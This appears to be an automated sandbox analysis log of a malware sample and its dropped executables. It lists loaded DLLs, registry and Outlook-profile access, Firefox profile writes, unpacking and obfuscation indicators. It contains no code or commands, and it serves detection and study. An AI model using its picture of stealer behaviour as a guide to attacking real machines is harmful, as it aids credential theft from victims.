Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: textinputframework.dll
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: coreuicomponents.dll
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: coremessaging.dll
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: ntmarta.dll
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: coremessaging.dll
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: wintypes.dll
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: wintypes.dll
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: wintypes.dll
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: wtsapi32.dll
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: winsta.dll
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: textshaping.dll
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: propsys.dll
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: explorerframe.dll
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: iertutil.dll
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: profapi.dll
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: edputil.dll
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: urlmon.dll
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: srvcli.dll
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: netutils.dll
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: appresolver.dll
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: bcp47langs.dll
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: slc.dll
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: userenv.dll
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: sppc.dll
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: C:\Program Files\Mozilla Firefox\firefox.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\compatibility.ini
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2401826383.000000006C61D000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2402076310.000000006C7DF000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.2402076310.000000006C7DF000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2401826383.000000006C61D000.00000002.00000001.01000000.00000008.sdmp

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.lowo:R;.nade:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Unpacked PE file: 5.2.RoamingCFCGIIEHIE.exe.360000.0.unpack :EW;.rsrc:W;.idata :W; :EW;cwtgiuyn:EW;mrbyzpwc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;cwtgiuyn:EW;mrbyzpwc:EW;.taggant:EW;
Source: C:\Users\userAKKKFBGDHJ.exe Unpacked PE file: 8.2.userAKKKFBGDHJ.exe.40000.0.unpack :EW;.rsrc:W;.idata :W; :EW;pcxsfzhs:EW;plzfkdac:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;pcxsfzhs:EW;plzfkdac:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Unpacked PE file: 9.2.explorti.exe.3a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;cwtgiuyn:EW;mrbyzpwc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;cwtgiuyn:EW;mrbyzpwc:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Unpacked PE file: 10.2.explorti.exe.3a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;cwtgiuyn:EW;mrbyzpwc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;cwtgiuyn:EW;mrbyzpwc:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 16.2.axplong.exe.7f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;pcxsfzhs:EW;plzfkdac:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;pcxsfzhs:EW;plzfkdac:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 18.2.axplong.exe.7f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;pcxsfzhs:EW;plzfkdac:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;pcxsfzhs:EW;plzfkdac:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Unpacked PE file: 19.2.explorti.exe.3a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;cwtgiuyn:EW;mrbyzpwc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;cwtgiuyn:EW;mrbyzpwc:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Unpacked PE file: 20.2.624f4d727e.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.lowo:R;.nade:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Unpacked PE file: 23.2.bdb44f72d9.exe.2b0000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.rsrc:R;Unknown_Section6:EW;.data:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:R;.rsrc:R;Unknown_Section6:EW;.data:EW;
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Unpacked PE file: 24.2.624f4d727e.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.lowo:R;.nade:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Unpacked PE file: 27.2.bdb44f72d9.exe.2b0000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.rsrc:R;Unknown_Section6:EW;.data:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:R;.rsrc:R;Unknown_Section6:EW;.data:EW;
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Unpacked PE file: 34.2.624f4d727e.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.lowo:R;.nade:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Unpacked PE file: 20.2.624f4d727e.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Unpacked PE file: 24.2.624f4d727e.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Unpacked PE file: 34.2.624f4d727e.exe.400000.0.unpack
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004195E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_004195E0
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: explorti.exe.5.dr Static PE information: real checksum: 0x1cd2f9 should be: 0x1cfa89
Source: axplong.exe.8.dr Static PE information: real checksum: 0x1d101c should be: 0x1d2453
Source: RoamingCFCGIIEHIE.exe.0.dr Static PE information: real checksum: 0x1cd2f9 should be: 0x1cfa89
Source: userAKKKFBGDHJ.exe.0.dr Static PE information: real checksum: 0x1d101c should be: 0x1d2453
Source: file.exe Static PE information: section name: .lowo
Source: file.exe Static PE information: section name: .nade
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr Static PE information: section name: .didat
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
